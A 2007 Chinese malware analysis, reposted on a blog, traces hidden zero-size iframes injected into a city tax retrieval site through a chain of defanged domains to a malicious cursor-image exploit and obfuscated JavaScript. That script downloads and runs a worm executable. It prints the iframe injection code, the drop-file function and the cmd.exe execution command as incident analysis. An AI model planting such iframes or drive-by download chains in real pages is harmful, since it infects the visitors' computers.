某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码

浅浅的花香味﹌ 2024-02-17 13:55 44阅读 0赞

**endurer** 原创  
2007-04-26 第**1**版

植入代码为：  
/---  
＜IFRAME src="hxxp://www.hao12\*\*3\*\*hao1\*\*23.cn/ok/index.htm" frameBorder=0 width=0 height=0＞＜/IFRAME＞  
\---/

**hxxp://www.hao12\*\*3\*\*hao1\*\*23.cn/ok/index.htm** 标题为：爱恋千雪，包含代码：  
/---  
＜iframe src="hxxp://www.qq5\*\*\*13.cn/bbs/177\*\*\*1.htm" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://www.qq5\*\*\*13.cn/bbs/177\*\*\*1.htm** 包含代码：  
/---  
＜iframe src="hxxp://www.5\*\*\*55\*y.net/" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://www.5\*\*\*55\*y.net/** 首页包含代码：  
/---  
＜iframe src=hxxp://www.97\*\*\*72\*\*5.com/97\*\*\*725\*\*16.htm?008 width=0 height=0＞＜/iframe＞  
\---/

**hxxp://www.97\*\*\*72\*\*5.com/97\*\*\*725\*\*16.htm?008** 包含代码：  
/---  
＜BODY style='CURSOR: url(hxxp://www.97\*\*\*72\*\*5.com/muxiao2.jpg)'＞＜/BODY＞  
＜/HTML＞  
＜script src=hxxp://www.97\*\*\*72\*\*5.com/0614.js＞＜/script＞  
\---/

**hxxp://www.97\*\*\*72\*\*5.com/muxiao2.jpg**（Kaspersky 报为：**Exploit.Win32.IMG-ANI.k**），下载 97725.exe。

文件说明符 : D:/test/97725.exe  
属性 : A---  
获取文件版本信息大小失败!  
创建时间 : 2007-4-26 17:41:54  
修改时间 : 2007-4-26 17:41:54  
访问时间 : 2007-4-26 17:43:0  
大小 : 16626 字节 16.242 KB  
MD5 : a76acec51b3acc5d4da8dbaeb5257e80

UpackByDwing

Kasersky 报为 **Worm.Win32.Delf.bs**

hxxp://www.97\*\*\*72\*\*5.com/0614.js 的内容为 JavaScript脚本，功能为用自定义函数解密代码并通过 eval（）来运行。

解密后的代码再次用eval（）解密来运行。

再次解密后的JavaScript代码的功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 97725.exe，保存到%windir%，文件名由自定义函数：

/---  
function gn（n）｛var number ＝ Math.random（）＊n;  
return ‘~tmp’+‘.tmp’；｝  
\---/

生成，即 ~tmp.tmp。然后通过 Shell.Application 对象 Q 的方法执行命令：%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。